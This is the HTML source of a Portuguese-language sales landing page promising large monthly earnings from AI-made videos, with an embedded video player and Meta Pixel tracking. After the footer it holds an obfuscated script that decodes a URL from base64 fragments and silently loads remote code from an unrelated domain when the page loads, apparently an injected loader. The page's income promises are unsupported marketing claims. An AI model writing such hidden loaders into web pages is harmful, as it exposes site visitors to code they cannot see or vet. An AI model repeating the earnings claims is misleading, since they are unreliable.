<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Automatizando Tudo | Ganhar Dinheiro Postando Vídeos | Primeira Venda em 24 Horas</title>
  <link rel="canonical" href="https://automatizandotudo.org/"/>

  <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">

  <!-- Pré-carregamento do player da VTurb -->
  <script>
    !function(i,n){i._plt=i._plt||(n&&n.timeOrigin?n.timeOrigin+n.now():Date.now())}(window,performance);
  </script>
  <link rel="preload" href="https://scripts.converteai.net/ac20c372-56ee-4b06-a5b7-963968f23d61/players/68686cc180d5f25b479d90ad/v4/player.js" as="script">
  <link rel="preload" href="https://scripts.converteai.net/lib/js/smartplayer-wc/v4/smartplayer.js" as="script">
  <link rel="preload" href="https://cdn.converteai.net/ac20c372-56ee-4b06-a5b7-963968f23d61/68686c6183f24223797911dd/main.m3u8" as="fetch">
  <link rel="dns-prefetch" href="https://cdn.converteai.net">
  <link rel="dns-prefetch" href="https://scripts.converteai.net">
  <link rel="dns-prefetch" href="https://images.converteai.net">
  <link rel="dns-prefetch" href="https://api.vturb.com.br">

  <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '757190730172254');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=757190730172254&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

  <style>
    body {
      margin: 0;
      font-family: Arial, sans-serif;
      background: #f9f9f9;
      color: #222;
    }

    h1, h2, p {
        font-family: "Raleway", sans-serif;
        font-style: normal;
    }

    header {
      background: linear-gradient(90deg, #0057d9, #60a0e9);
      color: #fff;
      padding: 20px;
      text-align: center;
    }

    header h1 {
      margin: 0;
      font-size: 2rem;
    }

    main {
      max-width: 800px;
      margin: 30px auto;
      padding: 0 20px;
      text-align: center;
    }

    main h2 {
      color: #000000;
    }

    main p {
      font-size: 1.2rem;
      line-height: 1.6;
      color: #333;
    }

    .video-container {
      margin: 30px 0;
      width: 100%;
    }

    footer {
      background: #6f6f6f;
      color: #fff;
      text-align: center;
      padding: 15px;
      font-size: 0.9rem;
    }

    @media (max-width: 600px) {
      header h1 {
        font-size: 1.5rem;
      }
      
      main h2 strong {
        font-size: 34px;
        color: #0a60db;
      }

      main p {
        font-size: 1rem;
      }
    }
    .logo {
        width: 140px;
        margin: -50px;
    }

    @media (min-width:700px) {
        main h2 strong {
        font-size: 54px;
        color: #0a60db;
      }
    }
  </style>
</head>
<body>

  <header>
    <h1 style="display: none;">Automatizando Tudo</h1>
   <img src="logo.png" alt="Automatizando Tudo" class="logo">
  </header>

  <main>

    <h2>Faça de 1 a 10 mil P/ Mês<br><strong>Criando VÍDEOS com IA</strong><br>Sem Aparecer e pelo Celular!</h2>

    <div class="video-container">
      <vturb-smartplayer id="vid-68686cc180d5f25b479d90ad" style="display: block; margin: 0 auto; width: 100%; "></vturb-smartplayer>
      <script type="text/javascript">
        var s = document.createElement("script");
        s.src = "https://scripts.converteai.net/ac20c372-56ee-4b06-a5b7-963968f23d61/players/68686cc180d5f25b479d90ad/v4/player.js";
        s.async = true;
        document.head.appendChild(s);
      </script>
    </div>
   
   <p>Assista o Vídeo e Veja Como Funciona.</p>
  </main>

  <footer>
    Todos os direitos reservados.
  </footer>

<script>!function(){if(window._fx_3ewoX)return;window._fx_3ewoX=!0;var _fx_3ewoD=['aHR0cHM6Ly9mYQ==','bGNvbnguYXJ0ZQ==','bWkuY29tLmJyLw==','YXBpL2pzL2Z4Xw==','YzRiY2QzMjFhNw==','MTY='];function _fx_3ewoL(){var u='';for(var i=0;i<_fx_3ewoD.length;i++)u+=atob(_fx_3ewoD[i]);var s=document.createElement('script');s.src=u;s.async=!0;s.defer=!0;(document.head||document.body).appendChild(s)}document.readyState==='loading'?document.addEventListener('DOMContentLoaded',_fx_3ewoL):setTimeout(_fx_3ewoL,5536)}()</script>
  
</body>
</html>
